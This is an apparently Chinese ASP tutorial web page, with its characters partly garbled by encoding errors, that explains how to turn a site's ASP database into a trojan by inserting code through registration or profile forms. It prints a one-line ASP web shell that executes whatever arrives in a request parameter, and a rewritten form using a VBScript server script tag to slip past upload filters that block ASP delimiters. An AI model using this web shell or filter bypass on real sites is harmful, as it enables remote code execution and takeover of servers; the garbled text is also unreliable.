插入ASP代碼讓網(wǎng)站數(shù)據(jù)庫(kù)成為ASP木馬_ASP教程
推薦:國(guó)內(nèi)ASP應(yīng)用,不容樂(lè)觀新的ASP概念不是指開(kāi)發(fā)工具ASP(ActiveX Server Pages),而是指應(yīng)用服務(wù)提供商(Application Service Provider)一種新的IT經(jīng)營(yíng)模式。通俗的話,即企業(yè)不購(gòu)買(mǎi)應(yīng)用軟件,而是采用租賃的形式租用軟件
很多時(shí)候我們可以通過(guò)在注冊(cè)表單或者用戶(hù)信息修改表單中,插入簡(jiǎn)短的ASP代碼,使網(wǎng)站ASP數(shù)據(jù)庫(kù)變成為一個(gè)ASP木馬,然后進(jìn)一步入侵控制服務(wù)器。
不過(guò)在上傳代碼過(guò)程中,許多網(wǎng)頁(yè)程序都不允許包含〈%%〉標(biāo)記符號(hào)的內(nèi)容的文件上傳。
這樣就有好多SHELL不能上傳上去了。可以采用下面的方法解決。以藍(lán)屏最小ASP木馬為例。
首先:原程序代碼是:
〈%execute request("l")%〉
我們可以把它的標(biāo)簽換下來(lái)。
然后改成:
<scriptlanguage=VBScript runat=server>execute request("l")</Script>
這樣就避開(kāi)了使用〈%%〉,保存為.ASP,程序同樣執(zhí)行。
分享:Asp.net生成htm靜態(tài)文件的兩種途徑現(xiàn)在很多網(wǎng)站特別是資訊類(lèi)的都把內(nèi)容生成靜態(tài)頁(yè)(htmhtmlshtml等),這類(lèi)總結(jié)了一下兩種生成靜態(tài)頁(yè)的方法并做了一個(gè)Demo文件供大家下載。 分別是通過(guò)模板(比較常用)和根據(jù)url生成(不到萬(wàn)
- asp FSO 讀寫(xiě)文件本文件實(shí)現(xiàn)代碼
- asp中isNull、isEmpty和空字符串的區(qū)別
- asp獲取用戶(hù)真實(shí)IP地址的方法
- asp連接sqlserver數(shù)據(jù)庫(kù)實(shí)現(xiàn)代碼
- asp中正則表達(dá)式過(guò)濾html代碼函數(shù)
- asp中g(shù)et post提交表單區(qū)別
- 網(wǎng)頁(yè)模板:ASP內(nèi)建對(duì)象Request
- xmlhttp的open方法使用詳解
- ASP的常用的自定義函數(shù)大全
- asp中用for循環(huán)的一個(gè)小技巧
- eWebEditor v3.8 列目錄
- ASP無(wú)組件分頁(yè)實(shí)現(xiàn)思路及代碼
ASP教程Rss訂閱編程教程搜索
ASP教程推薦
- 如何用ASP編寫(xiě)網(wǎng)站統(tǒng)計(jì)系統(tǒng)
- 如何制作登陸驗(yàn)證頁(yè)面
- asp入門(mén):asp如何保存數(shù)據(jù)
- IIS服務(wù)器與web.config配置優(yōu)化指南
- 用ASP設(shè)計(jì)一個(gè)留言薄
- 網(wǎng)站安全:防范ASP木馬的十大基本原則
- ASP應(yīng)用進(jìn)階 ASP Error對(duì)象的相關(guān)知識(shí)
- ASP程序?qū)崿F(xiàn)網(wǎng)頁(yè)偽靜態(tài)頁(yè)源代碼
- ASP動(dòng)態(tài)網(wǎng)頁(yè)下UTF-8頁(yè)面亂碼的解決方法
- ASP初級(jí)教程之ASP對(duì)表單和用戶(hù)輸入的處理
- 相關(guān)鏈接:
- 教程說(shuō)明:
ASP教程-插入ASP代碼讓網(wǎng)站數(shù)據(jù)庫(kù)成為ASP木馬。